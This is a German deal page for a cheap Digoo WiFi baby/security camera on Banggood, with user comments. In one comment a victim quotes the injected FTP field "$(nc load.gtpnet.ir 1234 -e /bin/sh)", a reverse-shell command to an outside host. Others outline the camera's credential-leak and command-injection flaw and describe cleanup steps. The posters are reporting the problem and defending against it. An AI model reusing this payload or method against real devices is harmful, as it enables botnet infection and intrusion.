1194°
WLAN 720p Kamera mit IOS / Android Fernsteuerung - Vorbestellung bei Banggood ! Babyphone / Nachtsicht / Sicherheitskamera (Video-Anruf bei "Gast")
WLAN 720p Kamera mit IOS / Android Fernsteuerung - Vorbestellung bei Banggood ! Babyphone / Nachtsicht / Sicherheitskamera (Video-Anruf bei "Gast")
ElektronikBanggood Angebote

WLAN 720p Kamera mit IOS / Android Fernsteuerung - Vorbestellung bei Banggood ! Babyphone / Nachtsicht / Sicherheitskamera (Video-Anruf bei "Gast")

Preis:Preis:Preis:14,95€
Zum DealZum DealZum Deal

Bei Banggood kann man eine Wifi-Kamera ( Digoo-BB-M2 Mini ) vorbestellen, diese kann über Wifi das Signal auf einen PC / ein Handy (Android / IOS) übertragen oder auf einer Speicherkarte das Video speichern.
Aufnahmequalität ist in HD (720p - 1280x720 Pixel). Perfekt als Baby-"phone" bzw. als Sicherheitskamera (mit Nachtsicht-Funktion).
Sie kann z.B. per "Audio-Alarm" scharf-gestellt werden und benachrichtig einen dann auf dem Handy, dass jemand "zuhause" ist
Für knapp 15€ ist es vielleicht die Spielerei wert.

Dies ist nur eine Vorbestellung, die Kamera wird ab dem 22.11. ausgeliefert (nach der Vorbestellzeit wird sie vorraussichtlich 27€ kosten).
Banggood hat eine Lieferzeiten von 7-20 Tagen (kostenlos). Mit geringem Aufpreis auch schneller.

Alternativ auch in SCHWARZ:
banggood.com/Dig…112

Viel Spaß



Ps.: die Vorgängerversion (Link: banggood.com/Dig…tml ) kostet knapp 19€ und hat bei über 100 Bewertungen 4,9 von 5 Sternen!


853668.jpg

Beste Kommentare

Für die nächste Teilnahme an der DDOS Attacke auf DNS Anbieter sehr gut geeignet

2 bestellt. Werde mal den Traffic von dem Teil analysieren. Big Brother is watching you!

Der Deal ist sehr interessant

Ich betreibe inzwischen 5 China WLAN FullHD IPCAMs im Außenbereich (je für unter 50€ inkl. Versand) - hatte hier auch als Deal eingestellt: mydealz.de/dea…e=2

Egal ob SMART TV oder eben IPCAMs: Ich traue den Teilen nicht. Meine Lösung als Tipp: uPNP deaktivieren und für die Geräte das Internet im Router sperren. Bei mir laufen die IPCAM Streams über einen RaspberryPi bzw. BananaPi mit OpenVPN auf meinen Handys. Zumindest meine Kameras sind sehr gesprächig: Mit einem HTTP Request entlocke ich den Teilen mein unverschlüsseltes WLAN Passwort. Von daher erwarte ich nciht zuviel von den mitgelieferten Diensten.

Jungs nicht vergessen, wenn Ihr mehrere bestellt, schön einzeln bestellen, sonst wenn es beim Zoll landet, müsst ihr Einf.Steuer bezahlen.

369 Kommentare

Vielleicht ließt hier ja noch jemand.
Die Cam läuft, sendet aber, sobald eine Bewegung kommt nur Fotos an meinen NAS. Was muss ich tun, damit auch ein Video ab Trigger aufgenommen wird? Habe keine SD Karte im Slot, muss dafür eine drin sein zum zwischenspeichern?

Ich hoffe, ich bekomme hier noch eine Antwort

ich lese hier noch und habe die Kamera erst neulich bestellt. will die dann auch im NAS DS216j betreiben. helfen kann ich jedoch aktuell nicht

direkter Stream über den Browser (ohne Ton):

13836514-TMnmw.jpg
Um die CAM mit der qnap surveillance station zu verbinden, verwende ich folgende Einstellungen:
13836514-rmv89.jpg

und hier die Settings für die App "IP Cam Viewer"
13836514-1rNu6.jpg
Bearbeitet von: "loony1337" 14. Apr

Meine Kamera ist gehackt worden!
Die Telekom hat mir einen Brief geschrieben, dass hinter meinem DSL Anschluss ein mirai botnet läuft. Da ich zu dem angegebenen Zeitpunkt überhaupt nicht zu Hause war, konnte es nur diese Kamera sein. Gerade habe ich nachgeschaut und als FTP Server ist "$(nc load.gtpnet.ir 1234 -e /bin/sh)" eingetragen. Hab das Ding natürlich sofort vom Internet getrennt.
Wie sind die Verbrecher da rein gekommen? Das admin Passwort hatte ich selbstverständlich geändert. Wie werde ich den Mist jetzt wieder los und wie verhindere ich, dass das wieder passiert?

Krass

Update:
Die Probleme sind anscheinend bekannt (Google "Multiple vulnerabilities found in Wireless IP Camera"). Letztendlich kann man mit einem http Aufruf ein File downloaden, in dem Nutzernamen und Passwort im Klartext drin stehen. Wenn man das Login einmal hat, kann man über das gefälschte Setzen des FTP Servers im Web-Interface beliebigen Code ausführen (und natürlich auch das Kamerabild anschauen).

Die Kamera ist also immer wieder zu hacken (auch wenn das Passwort geändert wird) und gehört sofort in die Tonne!

Vivatvor 19 h, 35 m

Meine Kamera ist gehackt worden!...


Danke für die Info. Meine ist auch betroffen. Habe mir mal die Skripte angeguckt, sehr interessant. Leider ist die Binärdatei nicht wirklich lesbar
Ich hatte in meiner alle Ports UDP und alle Port TCP bis auf 81 und 10554 gesperrt. Jedoch habe ich diese Ports weitergeleitet, so dass ich Zugriff von draußen habe. Diesen werde ich nun auch sperren und nur per VPN darauf zugreifen. Mal gucken, ob die dann noch da rauf kommen.
Weiterhin ist wohl auch ein bisschen UPnP schuld, da ich dieses in der Fritzbox aktiviert habe und er sich somit einfach Ports öffnen kann.
Zudem habe ich die Domain beim iranischen Anbieter gemeldet (die IPs melden bringt wohl nichts, da die die sicherlich häufiger wechseln).
Doof bei der Cam ist auch, dass er nicht meinen DNS-Server als Haupt-DNS nutzt, sondern 8.8.8.8 (ist das Google?) und meinen als secondary. Somit bringt eine Webseitenfilter (Blacklist gtpnet.ir) gar nichts .

Ist das Problem behoben, wenn ich die Kamera vom Netz nehme oder bleiben Sachen in meinem Netzwerk? Bin in Netzwerksachen leider sehr laienhaft. Hatte bis jetzt lediglich die App genutzt.

laker122. Apr

Ist das Problem behoben, wenn ich die Kamera vom Netz nehme oder bleiben …Ist das Problem behoben, wenn ich die Kamera vom Netz nehme oder bleiben Sachen in meinem Netzwerk? Bin in Netzwerksachen leider sehr laienhaft. Hatte bis jetzt lediglich die App genutzt.


Wenn du unter den FTP-Einstellungen dieses Skript "$(nc load.gtpnet.ir ....)" siehst, dann bist du betroffen (sonst wahrscheinlich noch nicht.
Der "Wurm" ist wieder weg, wenn du die Kamera aus und wieder an machst, jedoch lädt er dann über die FTP-Einstellungen den "Wurm" erneut herunter. Daher hilft nur ein Reset (kleiner Knopf mit einer Nadel oder so am Kopf der Cam lange halten, bis die "Dame" Reset sagt). Danach ist der Wurm weg. Jedoch ist es sehr leicht, ihn wieder drauf zu bekommen (hierfür wird jedoch ein neuer Angriff benötigt),
Im Binärcode lässt sich bisschen lesen, dass der Wurm per "UPnP" versucht, andere Geräte zu finden. Darum auf jedenfall (wenn möglich) UPnP im Router deaktivieren (damit zumindest keine Ports geöffnet werden).
Ob andere Geräte betroffen sind, ist schwer zu sagen. Dieser wurm zielt speziell auf IP-Cams (Geräte mit einem unsicheren Linux Betriebssystem und arm, arm5, arm7, mips oder mpsl Prozessor bzw. Core) ab.
Wenn ich nicht falsch liegen, dann hat er bei mir auch ein Bild gemacht und dieses hoch geladen (lag im /tmp-Verzeichnis).
Leider weiß ich noch nicht wohin.
Zudem kannst du prüfen, ob dein Gerät in der Datenbank ist:
Gehe auf wieistmeineip.de und kopiere die IPV4-Adresse (z.B. 77.122.33.44).
Gehe dann auf shodan.io/ und trage dort die IP-Adresse in dem Suchfeld ein.
Hier steht für meine IP:
HTTP/1.1 401 Unauthorized
Server: GoAhead-Webs
Date: Mon Apr 3 15:04:01 2017
WWW-Authenticate: Digest realm="WIFICAM", domain=":81",qop="auth", nonce="d6e7f08d21a373046092b67d1132923a", opaque="5ccc069c403ebaf9f0171e9517f40e41",algorithm="MD5", stale="FALSE"
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html
Und damit kann die "gefunden" werden

Dein Kommentar
Avatar
@
    Text